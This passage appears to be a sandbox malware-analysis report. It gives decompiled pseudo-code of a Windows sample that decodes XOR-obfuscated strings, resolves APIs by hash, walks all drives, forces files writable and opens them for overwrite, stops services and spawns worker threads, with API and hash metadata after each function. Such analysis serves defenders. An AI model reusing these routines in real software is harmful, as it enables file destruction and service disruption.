                					 *_t48 =  *_t48 ^ 0x22065fed;
                					_t48 =  &(_t48[1]);
                					_t65 = _t65 - 1;
                				} while (_t65 != 0);
                				_t51 = RegCreateKeyExW(0x80000002,  &_v112, 0, 0, 0, 0x20119, 0,  &_v12, 0); // executed
                				if(_t51 != 0) {
                					L9:
                					return _v8;
                				}
                				_t53 =  &_v112;
                				 *_t53 = 0x22745fbd;
                				_t53[1] = 0x22625f82;
                				_t53[2] = 0x22655f98;
                				_t53[3] = 0x22485f99;
                				_t53[4] = 0x226b5f8c;
                				_t53[5] = 0x22065f88;
                				_t66 = 6;
                				do {
                					 *_t53 =  *_t53 ^ 0x22065fed;
                					_t53 =  &(_t53[1]);
                					_t66 = _t66 - 1;
                				} while (_t66 != 0);
                				 *0x11012c0( &_v240, 0, 0x80);
                				_v16 = 1;
                				_v20 = 0x80;
                				_t60 = RegQueryValueExW(_v12,  &_v112, 0,  &_v16,  &_v240,  &_v20); // executed
                				if(_t60 == 0) {
                					_v8 = E010F5F98(_v20);
                					if(_v8 != 0) {
                						 *0x11012dc(_v8,  &_v240);
                					}
                				}
                				 *0x1101354(_v12);
                				goto L9;
                			}















                0x010fa13d
                0x010fa144
                0x010fa147
                0x010fa14d
                0x010fa154
                0x010fa15b
                0x010fa162
                0x010fa169
                0x010fa170
                0x010fa177
                0x010fa17e
                0x010fa185
                0x010fa18c
                0x010fa193
                0x010fa19a
                0x010fa1a1
                0x010fa1a8
                0x010fa1af
                0x010fa1b6
                0x010fa1bd
                0x010fa1c4
                0x010fa1cb
                0x010fa1d2
                0x010fa1d9
                0x010fa1e0
                0x010fa1e7
                0x010fa1ec
                0x010fa1ec
                0x010fa1f2
                0x010fa1f5
                0x010fa1f5
                0x010fa214
                0x010fa21c
                0x010fa2d3
                0x010fa2d9
                0x010fa2d9
                0x010fa222
                0x010fa225
                0x010fa22b
                0x010fa232
                0x010fa239
                0x010fa240
                0x010fa247
                0x010fa24e
                0x010fa253
                0x010fa253
                0x010fa259
                0x010fa25c
                0x010fa25c
                0x010fa26d
                0x010fa276
                0x010fa27d
                0x010fa29c
                0x010fa2a4
                0x010fa2ae
                0x010fa2b5
                0x010fa2c1
                0x010fa2c7
                0x010fa2b5
                0x010fa2cd
                0x00000000

                APIs
                • RegCreateKeyExW.KERNEL32(80000002,?,00000000,00000000,00000000,00020119,00000000,?,00000000), ref: 010FA214
                • RegQueryValueExW.KERNEL32(?,?,00000000,00000001,?,00000080), ref: 010FA29C
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: CreateQueryValue
                • String ID:
                • API String ID: 2711935003-0
                • Opcode ID: 2f38f6911dc1761d7a6030aa43322873db7538dd43119de42d7aa39435d9f54b
                • Instruction ID: e4543d694e21b4b6cf58d5647d2b618abab804639c14cf162ead2376f6ccc4f9
                • Opcode Fuzzy Hash: 2f38f6911dc1761d7a6030aa43322873db7538dd43119de42d7aa39435d9f54b
                • Instruction Fuzzy Hash: 6241F3B1910304EFD759CF41CA89B99BBB8FB04304F4286D9E615AF2A2E7719A44CF91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E010FB9B6(WCHAR* _a4) {
                				long _v8;
                				long _v12;
                				void* _v16;
                				void* _t16;
                
                				_v12 = 0;
                				_v8 = 0;
                				while(1) {
                					SetFileAttributesW(_a4, 0x80); // executed
                					_t16 = CreateFileW(_a4, 0x40000000, 0, 0, 3, 0, 0); // executed
                					_v16 = _t16;
                					if(_t16 != 0xffffffff) {
                						break;
                					}
                					if( *[fs:0x34] != 0x20) {
                						if( *[fs:0x34] != 5) {
                							goto L11;
                						} else {
                							if(_v8 == 0) {
                								E010F67F0(_a4);
                								_v8 = _v8 + 1;
                								continue;
                							}
                						}
                					} else {
                						if(E010FB46A(_a4) != 0) {
                							continue;
                						}
                					}
                					L13:
                					if(_v16 != 0xffffffff) {
                						 *0x1101354(_v16);
                					}
                					return _v12;
                				}
                				_v12 = 1;
                				goto L13;
                			}







                0x010fb9c1
                0x010fb9c8
                0x010fb9cf
                0x010fb9d7
                0x010fb9ef
                0x010fb9f5
                0x010fb9fb
                0x00000000
                0x00000000
                0x010fba05
                0x010fba1f
                0x00000000
                0x010fba21
                0x010fba25
                0x010fba2a
                0x010fba2f
                0x00000000
                0x010fba36
                0x010fba25
                0x010fba07
                0x010fba11
                0x00000000
                0x010fba13
                0x010fba11
                0x010fba47
                0x010fba4b
                0x010fba50
                0x010fba50
                0x010fba61
                0x010fba61
                0x010fba3c
                0x00000000

                APIs
                • SetFileAttributesW.KERNEL32(00000000,00000080,?,00000000,?,?,?), ref: 010FB9D7
                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?,?,?), ref: 010FB9EF
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: File$AttributesCreate
                • String ID:
                • API String ID: 415043291-0
                • Opcode ID: 2906c795120334e5e067e97229675492a2deb2dd5afac28518fa5e8285e2b585
                • Instruction ID: f9ebd666008726e53e8969af2376f7b7d5779867e13c48ff067a67fc4158e866
                • Opcode Fuzzy Hash: 2906c795120334e5e067e97229675492a2deb2dd5afac28518fa5e8285e2b585
                • Instruction Fuzzy Hash: E611CA70905204FAEB318F54DD46BAC7BF4EB00726F1042ADE791648E0D7B55688CF41
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E010F69C4() {
                				short _v524;
                				int _t5;
                				unsigned int _t6;
                				unsigned int _t7;
                				WCHAR* _t8;
                
                				_t5 = GetLogicalDriveStringsW(0x104,  &_v524); // executed
                				_t6 = _t5;
                				if(_t6 != 0) {
                					_t7 = _t6 >> 2;
                					_t8 =  &_v524;
                					do {
                						_t5 = GetDriveTypeW(_t8); // executed
                						if(_t5 == 3 || _t5 == 2) {
                							_t5 = E010F6A11(_t8); // executed
                						}
                						_t8 =  &(_t8[4]);
                						_t7 = _t7 - 1;
                					} while (_t7 != 0);
                				}
                				return _t5;
                			}








                0x010f69d9
                0x010f69df
                0x010f69e3
                0x010f69e5
                0x010f69e8
                0x010f69ee
                0x010f69ef
                0x010f69f8
                0x010f6a00
                0x010f6a00
                0x010f6a05
                0x010f6a08
                0x010f6a09
                0x010f69ee
                0x010f6a10

                APIs
                • GetLogicalDriveStringsW.KERNEL32(00000104,?), ref: 010F69D9
                • GetDriveTypeW.KERNEL32(?), ref: 010F69EF
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Drive$LogicalStringsType
                • String ID:
                • API String ID: 1630765265-0
                • Opcode ID: ad77fdae7ddbf8fc17eb27204c16ced8053cf91eae9b4bb21cf9d2d336b667a9
                • Instruction ID: 79289214b437404c128f87ca2fd025708880149a59845bc8818629520d4571d4
                • Opcode Fuzzy Hash: ad77fdae7ddbf8fc17eb27204c16ced8053cf91eae9b4bb21cf9d2d336b667a9
                • Instruction Fuzzy Hash: 9CE09B3550471A57DB71A5D94C8A5DA739CCB01300F0006E4DB94D2901DF91D9898F91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E010FBA3A() {
                				void* _t14;
                				void* _t24;
                
                				while(1) {
                					SetFileAttributesW( *(_t24 + 8), 0x80); // executed
                					_t14 = CreateFileW( *(_t24 + 8), 0x40000000, 0, 0, 3, 0, 0); // executed
                					 *(_t24 - 0xc) = _t14;
                					if(_t14 != 0xffffffff) {
                						break;
                					}
                					if( *[fs:0x34] != 0x20) {
                						if( *[fs:0x34] != 5) {
                							goto L11;
                						} else {
                							if( *((intOrPtr*)(_t24 - 4)) == 0) {
                								E010F67F0( *(_t24 + 8));
                								 *((intOrPtr*)(_t24 - 4)) =  *((intOrPtr*)(_t24 - 4)) + 1;
                								continue;
                							}
                						}
                					} else {
                						if(E010FB46A( *(_t24 + 8)) != 0) {
                							continue;
                						}
                					}
                					L14:
                					if( *(_t24 - 0xc) != 0xffffffff) {
                						 *0x1101354( *(_t24 - 0xc));
                					}
                					return  *((intOrPtr*)(_t24 - 8));
                				}
                				 *((intOrPtr*)(_t24 - 8)) = 1;
                				goto L14;
                			}





                0x010fb9cf
                0x010fb9d7
                0x010fb9ef
                0x010fb9f5
                0x010fb9fb
                0x00000000
                0x00000000
                0x010fba05
                0x010fba1f
                0x00000000
                0x010fba21
                0x010fba25
                0x010fba2a
                0x010fba2f
                0x00000000
                0x010fba36
                0x010fba25
                0x010fba07
                0x010fba11
                0x00000000
                0x010fba13
                0x010fba11
                0x010fba47
                0x010fba4b
                0x010fba50
                0x010fba50
                0x010fba61
                0x010fba61
                0x010fba3c
                0x00000000

                APIs
                • SetFileAttributesW.KERNEL32(00000000,00000080,?,00000000,?,?,?), ref: 010FB9D7
                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?,?,?), ref: 010FB9EF
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: File$AttributesCreate
                • String ID:
                • API String ID: 415043291-0
                • Opcode ID: 23b0cbe915d290f77f2b7fc587ea0dccfa026497aca350a91fc2c74ed400c98f
                • Instruction ID: 2ba174cea579d9dcb0579203f59d2f53c8ec817cdc4a9c4627f2dd6d60766f89
                • Opcode Fuzzy Hash: 23b0cbe915d290f77f2b7fc587ea0dccfa026497aca350a91fc2c74ed400c98f
                • Instruction Fuzzy Hash: 05E04F70544204FAEB721F24DD07F6C3EA1AB04B61F109169FBE2ACCE0C7B4A6848E04
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 47%
                			E010FD009() {
                				void* _v8;
                				signed int _v12;
                				struct _SECURITY_ATTRIBUTES* _v16;
                				void* _v20;
                				unsigned int _v24;
                				unsigned int _v28;
                				unsigned int _v32;
                				void* _v36;
                				signed int _t61;
                				unsigned int _t64;
                				struct _SECURITY_ATTRIBUTES* _t68;
                				void* _t69;
                				void* _t73;
                				signed int _t74;
                				unsigned int _t76;
                				unsigned int _t81;
                				signed int _t82;
                				unsigned int _t83;
                				unsigned int _t84;
                				unsigned int _t88;
                				void* _t90;
                
                				_v24 = 0;
                				_v36 = E010F153E();
                				_t61 = E010F8BC9( *0x1100fe8, 0, 0); // executed
                				_t80 = _t61;
                				if(_t61 != 0) {
                					_v24 = E010F5F98(_t80 * 2);
                					__eflags = _v24;
                					if(_v24 != 0) {
                						_t64 = E010F8BC9( *0x1100fe8, _t80, _v24); // executed
                						_t81 = _t64;
                						__eflags = _t81;
                						if(_t81 != 0) {
                							_t82 = _t81 >> 2;
                							_v28 = E010F5F98(_t82 * 4);
                							__eflags = _v28;
                							if(_v28 != 0) {
                								_t68 = E010F5F98(_t82 * 4);
                								_v32 = _t68;
                								__eflags = _v32;
                								if(_v32 != 0) {
                									 *0x11015e4 = 0;
                									 *0x11015e8 = 0;
                									_v12 = 0;
                									_v16 = 0;
                									_t90 = _v24;
                									_t88 = _v28;
                									do {
                										_t69 = E010F890B( *0x1100fe8, _t90); // executed
                										__eflags = _t69 - 3;
                										if(_t69 == 3) {
                											L13:
                											_v20 = E010F6083(_t90);
                											_t69 = CreateThread(0, 0, E010FBF33, _v20, 0, 0); // executed
                											__eflags = _t69;
                											if(_t69 == 0) {
                												L16:
                												goto L22;
                											}
                											L14:
                											 *(_t88 + _v12 * 4) = _t69;
                											_v12 = _v12 + 1;
                											_v16 =  &(_v16->nLength);
                											_t69 = _v36;
                											__eflags = _v16 - _t69;
                											if(_v16 == _t69) {
                												_t74 =  *0x11013b0(_v16, _v28, 0, 0xffffffff);
                												_v12 = _t74;
                												 *(_t88 + _t74 * 4) = 0;
                												_t69 =  *0x1101354( *(_t88 + _t74 * 4));
                												_t35 =  &_v16;
                												 *_t35 = _v16 - 1;
                												__eflags =  *_t35;
                											}
                											goto L16;
                										}
                										__eflags = _t69 - 2;
                										if(_t69 != 2) {
                											__eflags = _t69 - 4;
                											if(_t69 != 4) {
                												goto L22;
                											}
                											_v20 = E010F6083(_t90);
                											_t69 =  *0x1101388(0, 0, E010FBF33, _v20, 4, 0);
                											_v8 = _t69;
                											__eflags = _v8;
                											if(_v8 == 0) {
                												goto L22;
                											}
                											_t76 = E010F8766( *0x1100fe8, _v8);
                											__eflags = _t76;
                											if(_t76 != 0) {
                												 *0x1101390(_v8);
                												_t69 = _v8;
                												goto L14;
                											}
                											 *0x1101350(_v8, 0);
                											_t69 =  *0x1101354(_v8);
                											goto L22;
                										}
                										goto L13;
                										L22:
                										_t90 = _t90 + 8;
                										_t82 = _t82 - 1;
                										__eflags = _t82;
                									} while (_t82 != 0);
                									__eflags = _v16;
                									if(_v16 == 0) {
                										while(1) {
                											L30:
                											_t68 =  *0x11015e4; // 0x84
                											__eflags = _t68 -  *0x11015e8; // 0x84
                											if(__eflags == 0) {
                												break;
                											}
                											 *0x11013a4(0x64);
                										}
                										L33:
                										if(_v32 != 0) {
                											_t68 = E010F5FB3(_v32);
                										}
                										if(_v28 != 0) {
                											_t68 = E010F5FB3(_v28);
                										}
                										if(_v24 == 0) {
                											return _t68;
                										} else {
                											return E010F5FB3(_v24);
                										}
                									}
                									_t83 = _v16;
                									do {
                										asm("lodsd");
                										__eflags = _t69;
                										if(_t69 != 0) {
                											asm("stosd");
                											_t83 = _t83 - 1;
                											__eflags = _t83;
                										}
                										__eflags = _t83;
                									} while (_t83 != 0);
                									_t73 =  *0x11013b0(_v16, _v32, 1, 0xffffffff);
                									_t84 = _v16;
                									do {
                										asm("lodsd");
                										_t73 =  *0x1101354(_t73);
                										_t84 = _t84 - 1;
                										__eflags = _t84;
                									} while (_t84 != 0);
                									goto L30;
                								}
                								goto L33;
                							}
                							goto L33;
                						}
                						goto L33;
                					}
                					goto L33;
                				}
                				goto L33;
                			}
























                0x010fd016
                0x010fd01e
                0x010fd02b
                0x010fd030
                0x010fd034
                0x010fd048
                0x010fd04b
                0x010fd04f
                0x010fd060
                0x010fd065
                0x010fd067
                0x010fd069
                0x010fd070
                0x010fd080
                0x010fd083
                0x010fd087
                0x010fd096
                0x010fd09b
                0x010fd09e
                0x010fd0a2
                0x010fd0a9
                0x010fd0b3
                0x010fd0bd
                0x010fd0c4
                0x010fd0cb
                0x010fd0ce
                0x010fd0d1
                0x010fd0d8
                0x010fd0dd
                0x010fd0e0
                0x010fd0e7
                0x010fd0ed
                0x010fd100
                0x010fd106
                0x010fd108
                0x010fd147
                0x00000000
                0x010fd147
                0x010fd10a
                0x010fd110
                0x010fd112
                0x010fd115
                0x010fd118
                0x010fd11b
                0x010fd11e
                0x010fd12a
                0x010fd130
                0x010fd136
                0x010fd13e
                0x010fd144
                0x010fd144
                0x010fd144
                0x010fd144
                0x00000000
                0x010fd11e
                0x010fd0e2
                0x010fd0e5
                0x010fd149
                0x010fd14c
                0x00000000
                0x00000000
                0x010fd154
                0x010fd167
                0x010fd16d
                0x010fd170
                0x010fd174
                0x00000000
                0x00000000
                0x010fd17f
                0x010fd184
                0x010fd186
                0x010fd1a1
                0x010fd1a7
                0x00000000
                0x010fd1a7
                0x010fd18d
                0x010fd196
                0x00000000
                0x010fd196
                0x00000000
                0x010fd1af
                0x010fd1af
                0x010fd1b2
                0x010fd1b3
                0x010fd1b3
                0x010fd1bb
                0x010fd1bf
                0x010fd1f8
                0x010fd1f8
                0x010fd1f8
                0x010fd1fd
                0x010fd203
                0x00000000
                0x00000000
                0x010fd209
                0x010fd209
                0x010fd211
                0x010fd215
                0x010fd21a
                0x010fd21a
                0x010fd223
                0x010fd228
                0x010fd228
                0x010fd231
                0x010fd243
                0x010fd233
                0x00000000
                0x010fd236
                0x010fd231
                0x010fd1c1
                0x010fd1ca
                0x010fd1ca
                0x010fd1cb
                0x010fd1cd
                0x010fd1cf
                0x010fd1d0
                0x010fd1d0
                0x010fd1d0
                0x010fd1d1
                0x010fd1d1
                0x010fd1df
                0x010fd1e5
                0x010fd1eb
                0x010fd1eb
                0x010fd1ed
                0x010fd1f3
                0x010fd1f4
                0x010fd1f4
                0x00000000
                0x010fd1eb
                0x00000000
                0x010fd0a4
                0x00000000
                0x010fd089
                0x00000000
                0x010fd06b
                0x00000000
                0x010fd051
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: 378c25c65704539551d58b4117421932977eb2fb49c4ca263336dde73363a4a1
                • Instruction ID: 4ace02c9e52065b3db48779ce88b9d1ee2459e2168aaa40f25002c3c5e548433
                • Opcode Fuzzy Hash: 378c25c65704539551d58b4117421932977eb2fb49c4ca263336dde73363a4a1
                • Instruction Fuzzy Hash: FA615770D0420AFFEF66ABD4DC86BAEBBB0FB05310F104169E75176590D7B99A85CB80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E010F5E5C() {
                				void* _t3;
                				void* _t6;
                				void* _t7;
                				void* _t8;
                				void* _t9;
                				void* _t10;
                				void* _t11;
                				void* _t12;
                				void* _t13;
                				void* _t14;
                				void* _t15;
                				void* _t16;
                				void* _t17;
                				void* _t18;
                				void* _t19;
                
                				_t3 = E010F581D(0x260b0745);
                				if(_t3 != 0) {
                					_t3 = HeapCreate(0x40000, 0, 0); // executed
                					_t22 = _t3;
                					if(_t3 != 0) {
                						_t3 = E010F581D(0x6e6047db);
                						_t20 = _t3;
                						if(_t3 != 0) {
                							_t6 = E010F5A86(_t3, 0x11012ac, 0x10f5afc, _t22, _t20); // executed
                							_t7 = E010F5A86(_t6, 0x1101368, 0x10f5bbc, _t22, _t20); // executed
                							_t8 = E010F5A86(_t7, 0x1101428, 0x10f5c80, _t22, _t20); // executed
                							_t9 = E010F5A86(_t8, 0x1101480, 0x10f5cdc, _t22, _t20); // executed
                							_t10 = E010F5A86(_t9, 0x11014b4, E010F5D14, _t22, _t20); // executed
                							_t11 = E010F5A86(_t10, 0x11014ec, 0x10f5d50, _t22, _t20); // executed
                							_t12 = E010F5A86(_t11, 0x11014fc, 0x10f5d64, _t22, _t20); // executed
                							_t13 = E010F5A86(_t12, 0x1101518, E010F5D84, _t22, _t20); // executed
                							_t14 = E010F5A86(_t13, 0x1101540, 0x10f5db0, _t22, _t20); // executed
                							_t15 = E010F5A86(_t14, 0x110154c, E010F5DC0, _t22, _t20); // executed
                							_t16 = E010F5A86(_t15, 0x1101554, E010F5DCC, _t22, _t20); // executed
                							_t17 = E010F5A86(_t16, 0x1101568, 0x10f5de4, _t22, _t20); // executed
                							_t18 = E010F5A86(_t17, 0x1101594, 0x10f5e14, _t22, _t20); // executed
                							_t19 = E010F5A86(_t18, 0x11015a8, 0x10f5e2c, _t22, _t20); // executed
                							return _t19;
                						}
                					}
                				}
                				return _t3;
                			}


















                0x010f5e69
                0x010f5e72
                0x010f5e81
                0x010f5e83
                0x010f5e87
                0x010f5e98
                0x010f5e9d
                0x010f5ea1
                0x010f5eb3
                0x010f5ec4
                0x010f5ed5
                0x010f5ee6
                0x010f5ef7
                0x010f5f08
                0x010f5f19
                0x010f5f2a
                0x010f5f3b
                0x010f5f4c
                0x010f5f5d
                0x010f5f6e
                0x010f5f7f
                0x010f5f90
                0x00000000
                0x010f5f90
                0x010f5ea1
                0x010f5e87
                0x010f5f97

                APIs
                • HeapCreate.KERNEL32(00040000,00000000,00000000,040D58A8,?,?,010FE8DA), ref: 010F5E81
                  • Part of subcall function 010F5A86: RtlAllocateHeap.NTDLL(?,00000000,0000000C,00000000,00000000,00000000,00000000,?,?,010F5EB8,011012AC,010F5AFC,00000000,00000000,4C661836), ref: 010F5AC3
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Heap$AllocateCreate
                • String ID:
                • API String ID: 2875408731-0
                • Opcode ID: 1a55b266b5bec27d44f0d532418613040835c94aae6252926eccebe3b499b3a0
                • Instruction ID: 4abc4714c6a3cfe135a39aa15c3f64a9ead5d408c3d84b254743efe4954b4e6a
                • Opcode Fuzzy Hash: 1a55b266b5bec27d44f0d532418613040835c94aae6252926eccebe3b499b3a0
                • Instruction Fuzzy Hash: 5021C960F8276239A13675A70C8FFCB0C5C8EE3FA5755124C77D5BED809AC48419C0B1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 16%
                			E010F724F() {
                				short* _v8;
                				void* _v12;
                				short* _v16;
                				short* _v20;
                				char _v24;
                				char _v52;
                				void* _t34;
                				short* _t46;
                				void* _t47;
                
                				_v8 = 0;
                				_v16 = 0;
                				_t34 = OpenSCManagerW(0, 0, 4); // executed
                				_v8 = _t34;
                				if(_v8 == 0) {
                					L8:
                					if(_v8 != 0) {
                						_t34 =  *0x1101464(_v8);
                					}
                					if(_v16 == 0) {
                						return _t34;
                					} else {
                						return E010F5FB3(_v16);
                					}
                				}
                				_v20 = 0;
                				 *0x1101454(_v8, 0, 0x30, 3, 0, _v20,  &_v20,  &_v24, 0, 0);
                				_t34 = E010F5F98(_v20); // executed
                				_v16 = _t34;
                				if(_v16 == 0) {
                					goto L8;
                				}
                				_t34 =  *0x1101454(_v8, 0, 0x30, 3, _v16, _v20,  &_v20,  &_v24, 0, 0);
                				if(_t34 == 0) {
                					goto L8;
                				}
                				_t46 = _v16;
                				do {
                					_t34 = E010F7365( *_t46);
                					if(_t34 != 0) {
                						_t34 =  *0x1101458(_v8,  *_t46, 0x10020);
                						_v12 = _t34;
                						if(_v12 != 0) {
                							 *0x11012c0( &_v52, 0, 0x1c);
                							_t47 = _t47 + 0xc;
                							 *0x110145c(_v12, 1,  &_v52);
                							 *0x1101460(_v12);
                							_t34 =  *0x1101464(_v12);
                						}
                					}
                					_t46 =  &(_t46[0x16]);
                					_v24 = _v24 - 1;
                				} while (_v24 != 0);
                				goto L8;
                			}












                0x010f7256
                0x010f725d
                0x010f726a
                0x010f7270
                0x010f7277
                0x010f7343
                0x010f7347
                0x010f734c
                0x010f734c
                0x010f7356
                0x010f7364
                0x010f7358
                0x00000000
                0x010f735b
                0x010f7356
                0x010f727d
                0x010f729e
                0x010f72a7
                0x010f72ac
                0x010f72b3
                0x00000000
                0x00000000
                0x010f72d4
                0x010f72dc
                0x00000000
                0x00000000
                0x010f72de
                0x010f72e1
                0x010f72e3
                0x010f72ea
                0x010f72f6
                0x010f72fc
                0x010f7303
                0x010f730d
                0x010f7313
                0x010f731f
                0x010f7328
                0x010f7331
                0x010f7331
                0x010f7303
                0x010f7337
                0x010f733a
                0x010f733d
                0x00000000

                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000004), ref: 010F726A
                  • Part of subcall function 010F5F98: RtlAllocateHeap.NTDLL(?,00000008,?,?,010F6457,00000014,?), ref: 010F5FA9
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: AllocateHeapManagerOpen
                • String ID:
                • API String ID: 963794170-0
                • Opcode ID: 5f95a8329f6f4529e14d44091c817d9d2604cf3835bc2c1e608d714810347cac
                • Instruction ID: a0b5954413d5bb0449bca18fd75544757685fa851e33dacd39ee0ada1ae88f7a
                • Opcode Fuzzy Hash: 5f95a8329f6f4529e14d44091c817d9d2604cf3835bc2c1e608d714810347cac
                • Instruction Fuzzy Hash: 19312231D40209FBEB269B94DD0ABEDBBB9FB08700F1440A8F610B60E0D7B56A94DB45
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CoInitialize.OLE32(00000000,?,?,?,?,00000000), ref: 010FC467
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Initialize
                • String ID:
                • API String ID: 2538663250-0
                • Opcode ID: b1d8614ee47164cd01f5c2ce41cfdb2003d2c6cdd6e95768d9b2e8a03fc0ccf0
                • Instruction ID: 9c4ad70908f546b0dafd326dc3b0635908a85b7c834bc258f8a863afd7f6b9fd
                • Opcode Fuzzy Hash: b1d8614ee47164cd01f5c2ce41cfdb2003d2c6cdd6e95768d9b2e8a03fc0ccf0
                • Instruction Fuzzy Hash: A2D13CB1900209AFEB198F90DA8AFADBBB8FB05300F1581E9E641AB561D774DA41CF51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E010F5A86(signed int __eax, void* _a4, void* _a8, void* _a12, void* _a16) {
                				void* _t12;
                				signed int _t14;
                				signed int _t15;
                
                				asm("lodsd");
                				_t12 = E010F5928(__eax ^ 0x22065fed); // executed
                				if(_t12 != 0) {
                					while(1) {
                						asm("lodsd");
                						if(_t12 == 0xcccccccc) {
                							break;
                						}
                						_t14 = E010F581D(_t12 ^ 0x22065fed); // executed
                						_t15 = _t14;
                						_t12 = RtlAllocateHeap(_a12, 0, 0xc);
                						if( *((intOrPtr*)(_t12 + 0xc)) != 0xffffffffabababab) {
                							asm("stosd");
                						}
                						 *_t12 = 0xb8;
                						 *(_t12 + 1) = _t15 ^ 0x22065fed;
                						 *((char*)(_t12 + 5)) = 0x35;
